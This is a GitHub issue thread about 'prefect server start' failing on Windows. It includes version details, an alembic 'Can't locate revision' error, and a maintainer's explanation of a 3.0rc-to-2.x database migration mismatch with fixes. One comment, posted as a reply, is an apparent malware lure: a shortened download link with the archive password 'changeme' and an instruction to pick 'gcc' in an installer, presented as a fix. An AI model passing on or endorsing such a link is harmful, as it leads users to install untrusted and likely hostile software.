### ISSUE TITLE
Prefect server startup fails on Windows

### ISSUE THREAD

**Issue by desertaxle** [PrefectHQ/prefect#15101]
### Bug summary

Running `prefect server start` results in the following error:

```
11:47:55.266 | ERROR   | root - An error occurred: [WinError 2] The system cannot find the file specified
```

### Version info (`prefect version` output)

```Text
Version:             3.0.0rc19
API version:         0.8.4
Python version:      3.12.5
Git commit:          524b83d0
Built:               Tue, Aug 27, 2024 11:17 AM
OS/Arch:             win32/ARM64
Profile:             local
Server type:         server
Pydantic version:    2.8.2
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lsscodes** [comment]
i am still having the server start issue, is there a specific version of Prefect I need to use?

Version:             2.20.3
API version:         0.8.4
Python version:      3.11.9
Git commit:          b8c27aa0
Built:               Thu, Aug 22, 2024 3:13 PM
OS/Arch:             win32/AMD64
Profile:             default
Server type:         server

**Comment by lsscodes** [comment]
@cicdw the previous error was gone, but I now have a different one

`anaconda3\envs\prefect\Lib\site-packages\alembic\script\base.py", line 282, in _catch_revision_errors
    raise util.CommandError(resolution) from re
alembic.util.exc.CommandError: Can't locate revision identified by 'f93e1439f022'

Application startup failed. Exiting.
Server stopped!`

`Version:             2.20.4
API version:         0.8.4
Python version:      3.11.9
Git commit:          3b951c35
Built:               Wed, Aug 28, 2024 9:09 PM
OS/Arch:             win32/AMD64
Profile:             default
Server type:         server`

**Comment by cicdw** [comment]
Ahhhh ok so here's what causes that:
- if you tested out the 3.0rc with a Prefect server, it automatically upgrades the database
- that upgrade included [this migration](https://github.com/PrefectHQ/prefect/blob/28b7bbc263199f5d20e474bd70eb4da4fa6b04b6/src/prefect/server/database/migrations/versions/sqlite/2024_08_14_145052_f93e1439f022_add_deployment_concurrency_limit.py#L3) which is unique to 3.0
- when you switched your server version _back_ to 2.20.4, the DB claims there is a migration that it can't find (because this migration isn't in 2.x)

In retrospect, we really should have made the 3.0rc's use a different database file.  If you want to use 3.0, the server startup was also fixed there so you'd be good to go.  If you  would rather use 2.20.4, you can either:
- delete the `~/.prefect/prefect.db` file entirely
- switch to 3.0rc then run `prefect server database downgrade -y -r 824e9edafa60` to downgrade the DB to a 2.x compatible state, then switch back to 2.20.4
